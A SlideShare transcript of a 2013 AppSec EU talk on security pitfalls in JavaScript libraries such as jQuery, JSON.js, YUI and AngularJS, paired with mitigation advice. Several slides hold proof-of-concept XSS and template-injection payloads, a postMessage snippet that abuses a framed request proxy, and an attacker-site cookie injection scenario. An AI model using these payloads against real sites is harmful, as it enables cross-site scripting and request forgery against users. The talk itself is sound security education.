SlideShare uma empresa Scribd logo

JavaScript Libraries (in)security: A showcase of reckless uses and unwitting misuses.

Stefano Di Paola
Stefano Di Paola

Client side code is a growing part of the modern web and those common patterns or libraries, that are supposed to help developer's life, have the drawbacks to add complexity to the code exposing unexpected features with no or little warning. We will focus on the most popular JavaScript libraries such as jQuery, YUI etc and common design pattern, describing how happens that wrong assumptions can lead to unexpected, unsafe behavior. Several code example and live demos during the talk will try to clear both exploitation techniques and positive coding strategies. The presentation will also show some interesting case study, collected and identified during two years of real world applications analysis. Slides of the talk I did at Appsec EU 2013 in Hamburg. Video will be linked asap.

Tecnologia
1 de 42
Baixar para ler offline
JS Libraries Insecurity Appsec EU 2013 Stefano di Paola CTO @ Minded Security stefano.dipaola@mindedsecurity.com
/me whois • Research – OWASP-Italy Senior Member – Testing Guide Contributor – OWASP SWFIntruder – DOMinator (JS Runtime Taint Engine) – Bug Hunter & Sec Research (Pdf Uxss, Flash Security, HPP) – Security Since '99 • Work – CTO @ Minded Security Application Security Consulting – Director of Minded Security Research Labs – Blog: http://blog.mindedsecurity.com – Twitter: @wisecwisec
Agenda • Intro • JQuery • JSON.js (OBG) • YUI • AngularJS • JS Libraries Management
About this talk • A wrap up of some interesting JS snippets • Reckless use of common libraries and third party scripts • Some unwitting one as well • Comes after 2.5 years developing/using DOMinator and DOMinatorPro
• What's a Sink in Application Security? “..a function or method that can be considered unsecure when one of its arguments come from an untrusted input and is not correctly validated according to the layer the function is going to communicate to.“ • C's strcpy is a sink. strcpy(dst,src) • Java's jdbc.executeQuery is a sink executeQuery('select * from t where id='+str) • JQuery.html is a sink (and no one complains) JQuery() is a Sink(?)
• JQuery is More than a Sink! • Other sinks do only one thing. JQuery was designed to perform different operations based on the argument type and content. JQuery() more than a Sink http://api.jquery.com/jQuery/
• JQuery was written with flexibility in mind • But introduced a design issue that could be called a 'developer trust boundary violation'. – The principal use is for selecting elements (trusted) – ...and 'onload' callback execution(trusted) – The least one used is the actual sink method: JQuery() more than a Sink jQuery( html [, ownerDocument ] ) Enough Words! Show Me The Code
• http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html http://bugs.jquery.com/ticket/9521 «XSS with $(location.hash) and $(#<tag>) is needed?» ("fixed" (?)) • http://bugs.jquery.com/ticket/11773 « jQuery needs HTML escaping functionality » (undecided) • From reddit's jquery-migrate-is-sink-too: http://www.reddit.com/r/programming/comments/1cqno2/ «.. geocar - This is one of my biggest gripes about jQuery: Using the same interface for query and executing is a Bad Idea, that is, $ ("<script>alert(69)</script>") simply shouldn't do anything at all. ..» Actually doesn't but he got the point..) -> $("<img src='dd' onerror='alert(1)'>") JQuery() Concerns History
• Might be considered as a potentially dangerous method ? – depends on how its results are further used. • It's more than querySelectorAll because there are features like: $("div:contains(" + word + ")") What if: word=),div[id=secret]:contains(cycleForDataExtr).. • If the results will affect something that is observable by an attacker, then we got a problem! JQuery() as a Selector?
• JQuery Users: – Never Use jQuery() or $() with an unvalidated argument – No matter which version you are using! – Read the whole documentation, please! – And since the doc is never really complete, take some time to read the code! • JQuery Developers, please: – remove old versions (zip them all for reference) – Plan to change the jQuery do-everything behaviour to a do-simply- one-thing behavior. JQuery() Solution
• $.ajax json(p) allows three ways to create a callback parameter: a. Explicit Callback Parameter in the url b. Explicit Callback Parameter in the object c. Callback Placeholder in the url JQuery.Ajax → HPP $.ajax({url:"//host/index.html", data: "kwrds=ss&cb=test", //{cb:'test', kwrds: 'ss' } dataType:'jsonp', cache:true, success:function(){} }) $.ajax({url: '//host/index.html?kwrds=ss', jsonp: "cb", dataType: "jsonp", success: function() { } }) $.ajax({url: '//host/?kwrds=ss&cb=?', dataType: "jsonp", success: function() { } })
• If there's HPP we can force the callback in the following cases: JQuery.Ajax Priority map Enough Words! Show Me The Code a(url) b(object) c(placehld) a(url) a c+'&'+a a+c b(object) b+'&'+a b c c(placehld) a+c c c
• Be sure you're not allowing Client side HPP by: – Encoding tainted values with encodeURIComponent (remember it may trigger exception) JQuery.Ajax Solution try{ kw= encodeURIComponent(location.hash.slice(1)) url = 'kwrds='+kw $.ajax({ url: url, jsonp:'callback', …. }) }catch(e){ /*stop execution..blahblah*/ }
• Devs often use $.html() with untrusted input. • Sometimes they validate that using wrong regexps patterns. JQuery.html(RegExpd) http://go.imgsmail.ru/js/unity.js?1308 h = /</?(.+?)/?>/ig; w.striptags = function(a, b) { var c = Array.isArray(b) ? b : null; return a.replace(h, c ? function(a, b) { return c.contains(b) ? a : "" } : "") };
• ..Or they unfortunately don't work as expected... JQuery.html(RegExpd) ... var test = z7696.location.search; } catch (z392c) { z82c5 = document; } ….. var z43ac = (zbea6.length - 1); var z33f9 = {}; for (var z205e = 0; z205e <= z43ac; z205e++) { var z6b05 = zbea6[z205e].split("="); z6b05[0] = unescape(z6b05[0]); z6b05[1] = unescape(z6b05[1]); z6b05[0] = z6b05[0].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/<.*?>/g, ""); z33f9[z6b05[0]] = z6b05[1]; …. http://ots.optimize.webtrends.com/ots/lib/3.2/wt_lib.js
• ..Or they fortunately don't work as expected... JQuery.html(RegExpd) var evil=false; var p1=/[";'<>@(){}!$^*-+|~`]/; // Regexp 4 special chars var p2=/(javascripts*:)|(alert)|/; // Regexp against XSS var url = location.href; if(url.match(p1) && url.match(p2)) // Fortunately Wrong!! evil=true; if(evil==false) div.innerHTML = url Enough Words! Show Me the Stuff!
Test those f#@#g RegExps!!! JQuery.html(RegExpd) solution
Test those f#@#g RegExps!!! … OR NOT (if you are damn lucky!) JQuery.html(RegExpd) solution
• Client Request Proxy – Feature of a company's web tool (not going to disclose it today) – https://vi.ct.im/XXX/XFrame/XFrame.html – Yes, it's framable by design! – Let's have a look at the code! JQuery.ajax(Proxifyme) window.onmessage = function(e) { var requestInput = JSON.parse(e.data); var request = buildRequest(requestInput, e.source, e.origin); $.ajax(request); }
• Attacker might just try to ask politely.. The code adds this unfriendly header: ..and the server unbelievably checks it! And returns 403. JQuery.ajax(Proxifyme) frame.location= "https://xxx/Autodiscover/XFrame/XFrame.html" var ob={ url:"/" } frame.postMessage(JSON.stringify(ob),"*") X-Ms-Origin: http://at.tack.er
• Attacker now asks less politely.. aaand... No success! Returns 403. JQuery.ajax(Proxifyme) frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", headers:{'X-Ms.Origin':'https://vi.ct.im'} } frame.postMessage(JSON.stringify(ob),"*") X-Ms-Origin: http://at.tack.er
• Attacker now is a bit frustrated but wait...read the jQ doc: JQuery.ajax(Proxifyme) var ob={ accepts:, // cache:, // contentType:, // Whatever data:, // "p1=v1&p2=v2.." headers:, An object of additional header key/value pairs to send along with requests using the XMLHttpRequest transport. The header X-Requested-With: XMLHttpRequest is always added. but its default XMLHttpRequest value can be changed here. Values in the headers setting can also be overwritten from within the beforeSend function. (version added: 1.5) processData:, // urlencode or not. type, // GET , POST HEAD BLAH url, // Url. xhrFields:, //XMLHttpRequest.attr = val messageId: //Internal }
• Attacker now is less frustrated he can try something more: aand ciao ciao custom headers! • .. but there's more.. JQuery.ajax(Proxifyme) frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", XhrFields:{setRequestHeader:void} } frame.postMessage(JSON.stringify(ob),"*")
• Why does it work? Why it doesn't break the code? We can actually add custom headers and block the X-Ms-Origin! JQuery.ajax(Proxifyme) // Need an extra try/catch for cross domain requests in Firefox 3 try { for ( i in headers ) { xhr.setRequestHeader( i, headers[ i ] ); } }catch( _ ) {}
• http://www.ietf.org/rfc/rfc4627.txt Security considerations: JSON.js (OBG) «Generally there are security issues with scripting languages. JSON is a subset of JavaScript, but it is a safe subset that excludes assignment and invocation. A JSON text can be safely passed into JavaScript's eval() function (which compiles and executes a string) if all the characters not enclosed in strings are in the set of characters that form JSON tokens. This can be quickly determined in JavaScript with two regular expressions and calls to the test and replace methods. var my_JSON_object = !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test( text.replace(/"(.|[^"])*"/g, ''))) && eval('(' + text + ')'); Interoperability considerations: n/a Published specification: RFC 4627»
• Old JSON.js implementation: JSON.js (OBG) http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html function jsonParse(string, secure) { if (secure && !/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/.test( string.replace(/./g, "@"). replace(/"[^"nr]*"/g, "")) ) { return null; } return eval("(" + string + ")"); }
• parseJSON('a') is considered valid even if it's not JSON → a is actually eval'ed! • Eaeflnr-u part with no quotes let's you do this. • Next step is to see if there some standard object in window that matches the JSON regexp. Results in: self status JSON.js (OBG) http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html for(var aa in window) if( aa.match(/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/)) console.log(""+aa)
• Still there's a lot of problems since () = cannot be used! • But on IE...: is seen as valid JSON and JSON.js (OBG) // Courtesy of Eduardo `sirdarckcat` Vela Nava +{ "valueOf": self["location"], "toString": []["join"], 0: "javascript:alert(1)", length: 1 }
JSON.js (OBG)
JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
JSON.js (OBG)
GWT's JSON safeToEval http://code.google.com/p/google-web- toolkit/source/browse/trunk/user/src/com/google/gwt/core/client/JsonUtils.java#78 /** * Returns true if the given JSON string may be safely evaluated by {@code * eval()} without undersired side effects or security risks. Note that a true * result from this method does not guarantee that the input string is valid * JSON. This method does not consider the contents of quoted strings; it * may still be necessary to perform escaping prior to evaluation for correct * results. * * <p> The technique used is taken from <a href="http://www.ietf.org/rfc/rfc4627.txt">RFC 4627</a>. */ public static native boolean safeToEval(String text) /*-{ // Remove quoted strings and disallow anything except: // // 1) symbols and brackets ,:{}[] // 2) numbers: digits 0-9, ., -, +, e, and E // 3) literal values: 'null', 'true' and 'false' = [aeflnr-u] // 4) whitespace: ' ', 'n', 'r', and 't' return !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test(text.replace(/"(.|[^"])*"/g, ''))); }-*/;
JSON.js Solution • The new json.js uses a brand new regexp which "should" be safe • Or use json_parse.js which doesn't use eval. • ..or better use native methods JSON.parse / JSON.stringify if you can! • Finally, remember that after parsing you still have an unvalidated object! {"html":"<img src='s'onerror='XSSHere'>"}
Cookie Parsers • cookName=cookVal; cookName2=cookVal2 • There's no native cookie parser • Good code and bad code around the internet: function getCookieValue(name){ var p; var c=document.cookie; var arrs=c.split(‘;’); for(var i =0 ; i< arrs.length; i++) if( (p=arrs[i].indexOf(name))>0){ return arrs[i].substr(p); } } getCookieVal(“mycookieName=”)
Cookie Parsers • what if some Js writes a value like this: document.cookie=‘ref=’+document.referrer • And somewhere else: eval( getCookieVal(“userHistory”) )
Cookie Parsers set an attacker site: http://www.attacker.com/userHist=alert(1) Iframing victim site which will sets cookie: ref=http://www.attacker.com/userHist=alert(1) Then looks for userHist and Boom!
• YUI().use('jsonp', 'jsonp-url') http://yuilibrary.com/yui/docs/jsonp/ HPP anyone? YUI.js JSONP Customizing the JSONP URL The default URL formatter simply replaces the "{callback}" placehold with the name of the generated proxy function. If you want to customize the URL generation process, you can provide a format function in the configuration. The function will receive the configured URL (with "{callback}" placeholder), the string name of the proxy function, and any additional arguments that were passed to send(). Enough Words! Show Me The Code
• Omniture, Web Trends, Google Ads... • Several issues found and fixed • Web Trends is a web analytics service. • DEBUG version based on parameters → HTML Injection? (They know about it) + actually this requires popup blocker disabled 3rd party services give 3rd party surprises http://XXXX/en-us/default.aspx? aaaa=11111111&gclid=1111&=&_wt.debug=2222&_wt.mode=preview&toJSON=4444&normal=9999&staging =aaaa&preview=bbbb&none=cccc&#bbbbb=2222222&%3Cs%3Essss Enough Words! Show Me The Code
• Test and audit all the 3rd party libraries / js! • Do it periodically if they are external resources 3rd party services solution
• Mustache + Expression Language → Interesting Injections • AngularJS uses stuff like: <div ng-init="some.js.code.here"> or {{constructor.constructor('alert(1)')()}} • AngularJS uses it's own parser (similar to Expression Language). • If there's an inection point, no actual antiXSS filter will be able to stop these attacks. • Credits to .Mario (MVCOMFG) and Kuza55 (https://communities.coverity.com/blogs/security/2013/04/23/angular- template-injection) as well for their awesome research on this topic! AngularJS
• JavaScript code can always be read so black box turns into white box analysis • JavaScript secure development is still not fully implemented even on companies that know about security. • JavaScript Developers can be super badass coders but also naives as well on some circumstances and their code is available for everyone. • Just scratched the surface of JavaScript security! • Let's give jSanity a try! :) Conclusions
Tnx! ^_^ Go and exploit /* ethically */ Q&A Mail: stefano.dipaola@mindedsecurity.com Twitter: wisecwisec Thanks!

Recomendados

HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
jQuery
jQueryjQuery
jQueryJulie Iskander
 
CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesPostgreSQL Experts, Inc.
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerMatthew Buchanan
 
Effective communication
Effective communicationEffective communication
Effective communicationhussulinux
 
RHCSA
RHCSARHCSA
RHCSAMostafa elsayed
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 

Recomendados

HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
jQuery
jQueryjQuery
jQueryJulie Iskander
 
CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesPostgreSQL Experts, Inc.
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerMatthew Buchanan
 
Effective communication
Effective communicationEffective communication
Effective communicationhussulinux
 
RHCSA
RHCSARHCSA
RHCSAMostafa elsayed
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxConstantin Titarenko
 
Accessible dynamic forms
Accessible dynamic formsAccessible dynamic forms
Accessible dynamic formsDylan Barrell
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
PHP
PHPPHP
PHPsometech
 
UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997Muthuselvam RS
 
Advanced php
Advanced phpAdvanced php
Advanced phphamfu
 
Knolx j query-form-validation-slides
Knolx j query-form-validation-slidesKnolx j query-form-validation-slides
Knolx j query-form-validation-slidesKnoldus Inc.
 
A brief look inside UML
A brief look inside UMLA brief look inside UML
A brief look inside UMLYoan-Alexander Grigorov
 
RedHat-System Administration I - RH124
RedHat-System Administration I - RH124RedHat-System Administration I - RH124
RedHat-System Administration I - RH124Nikola Tokić
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingInformation Technology
 
Web Security
Web SecurityWeb Security
Web SecurityRene Churchill
 
Apache Web Server Setup 2
Apache Web Server Setup 2Apache Web Server Setup 2
Apache Web Server Setup 2Information Technology
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriartewebhostingguy
 
Php Security Workshop
Php Security WorkshopPhp Security Workshop
Php Security WorkshopAung Khant
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security TipsChris Tankersley
 
Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)Subhasis Nayak
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 

Mais conteúdo relacionado

Destaque

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Accessible dynamic forms
Accessible dynamic formsAccessible dynamic forms
Accessible dynamic formsDylan Barrell
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997Muthuselvam RS
 
Advanced php
Advanced phpAdvanced php
Advanced phphamfu
 
Knolx j query-form-validation-slides
Knolx j query-form-validation-slidesKnolx j query-form-validation-slides
Knolx j query-form-validation-slidesKnoldus Inc.
 
RedHat-System Administration I - RH124
RedHat-System Administration I - RH124RedHat-System Administration I - RH124
RedHat-System Administration I - RH124Nikola Tokić
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingInformation Technology
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriartewebhostingguy
 
Php Security Workshop
Php Security WorkshopPhp Security Workshop
Php Security WorkshopAung Khant
 
Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)Subhasis Nayak
 

Destaque (17)

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
 
Accessible dynamic forms
Accessible dynamic formsAccessible dynamic forms
Accessible dynamic forms
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
PHP
PHPPHP
PHP
 
UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997UpsilonPiEpsilon-UniversityOfBridgeport-May1997
UpsilonPiEpsilon-UniversityOfBridgeport-May1997
 
Advanced php
Advanced phpAdvanced php
Advanced php
 
Knolx j query-form-validation-slides
Knolx j query-form-validation-slidesKnolx j query-form-validation-slides
Knolx j query-form-validation-slides
 
A brief look inside UML
A brief look inside UMLA brief look inside UML
A brief look inside UML
 
RedHat-System Administration I - RH124
RedHat-System Administration I - RH124RedHat-System Administration I - RH124
RedHat-System Administration I - RH124
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
 
Web Security
Web SecurityWeb Security
Web Security
 
Apache Web Server Setup 2
Apache Web Server Setup 2Apache Web Server Setup 2
Apache Web Server Setup 2
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
 
Php Security Workshop
Php Security WorkshopPhp Security Workshop
Php Security Workshop
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security Tips
 
Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)Php, mysq lpart4(processing html form)
Php, mysq lpart4(processing html form)
 

Último

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsYoss Cohen
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Último (20)

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platforms
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
